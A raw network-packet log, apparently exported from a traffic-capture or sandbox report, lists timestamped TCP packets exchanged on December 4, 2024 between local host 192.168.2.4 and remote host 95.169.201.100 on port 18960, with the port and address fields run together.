                                                                                                                                                      Dec 4, 2024 13:58:08.528755903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.529335976 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.529792070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.529887915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.529922962 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.531147003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.531255960 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.531486988 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.532306910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.532370090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.532402039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.533881903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.534044027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.534080982 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.535100937 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.535295010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.535331011 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.536247015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.536386013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.536462069 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.537493944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.537652016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.537684917 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.538810015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.538919926 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.539052963 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.539957047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.540021896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.540083885 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.541254044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.541409016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.541780949 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.542500019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.542608023 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.542850971 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.543914080 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.543996096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.544043064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.544994116 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.545094967 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.545154095 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.546350002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.546510935 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.546623945 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.547658920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.547763109 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.547820091 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.549006939 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.589175940 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.617530107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.701438904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.701589108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.701767921 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.701843023 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.701953888 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.702008009 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.702574015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.702666998 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.702697992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.703320026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.703437090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.703468084 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.703910112 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.704200983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.704375029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.704423904 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.705226898 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.705308914 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.705346107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.706243992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.706397057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.706430912 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.707581997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.707632065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.707667112 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.708549976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.708661079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.708770037 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.709412098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.709516048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.709551096 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.710396051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.710572004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.710617065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.710988045 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.711417913 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.711533070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.711571932 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.712681055 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.712764978 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.712882996 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.713522911 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.713660955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.713700056 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.714546919 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.714725971 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.714767933 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.715704918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.715857983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.715893030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.716603994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.716691971 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.716725111 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.717576981 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.717693090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.717783928 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.717957020 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.718533039 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.718651056 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.718683004 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.719533920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.719613075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.719654083 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.720527887 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.720630884 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.720669985 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.721539021 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.721662998 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.721699953 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.722554922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.722651005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.722752094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.723669052 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.723767042 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.723943949 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.724828959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.724970102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.725012064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.726115942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.726258039 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.726289988 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.727345943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.727468014 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.727510929 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.728595018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.728913069 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.728955984 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.729712009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.729852915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.729883909 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.730848074 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.731019974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.731070995 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.731667042 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.731889009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.731973886 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.732014894 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.732788086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.732912064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.732948065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.733597994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.733705044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.733747005 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.734518051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.734627962 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.734672070 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.735517979 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.735599995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.735651970 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.736589909 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.736789942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.736824036 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.737591982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.737701893 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.737740993 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.738423109 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.738516092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.738552094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.739466906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.739526987 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.739723921 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.740228891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.740324020 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.740364075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.741118908 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.741238117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.741276979 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.741976976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.742043018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.742978096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.743016958 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.743083954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.743484020 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.744071007 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.744230986 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.744266033 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.745065928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.745186090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.745220900 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.746067047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.746243954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.747221947 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.747260094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.747302055 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.747487068 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.748192072 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.748327017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.748366117 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.749213934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.749429941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.749464035 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.750248909 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.750250101 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.750397921 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.751487970 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.751492023 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.751547098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.751905918 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.752681017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.752876997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.752913952 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.753736973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.753941059 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.753981113 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.754678965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.776808023 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.863060951 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.863181114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.863219023 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.863552094 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.863660097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.863718987 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.864634991 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.864743948 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.864907026 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.865593910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.865715027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.865956068 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.866624117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.866777897 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.866880894 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.867655039 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.867759943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.867939949 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.868645906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.868760109 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.868802071 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.869848967 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.869946957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.869982958 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.870919943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.871066093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.871143103 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.871743917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.871829987 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.872131109 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.872742891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.872853994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.872891903 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.873748064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.873851061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.873905897 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.874778032 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.874917984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.874965906 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.875811100 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.875925064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.875977039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.876857042 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.876924992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.876969099 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.877954960 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.878081083 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.878125906 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.878974915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.879149914 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.879208088 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.880233049 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.880362034 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.881159067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.881200075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.881237030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.882074118 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.882106066 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.882260084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.882312059 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.883002996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.883198977 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.883249044 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.884488106 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.884625912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.884673119 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.885279894 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.885379076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.885448933 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.886048079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.886162043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.886259079 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.887033939 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.887149096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.887185097 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.888204098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.888360023 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.888415098 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.889760017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.889908075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.889944077 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.891071081 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.891207933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.891257048 CET4973218960192.168.2.495.169.201.100
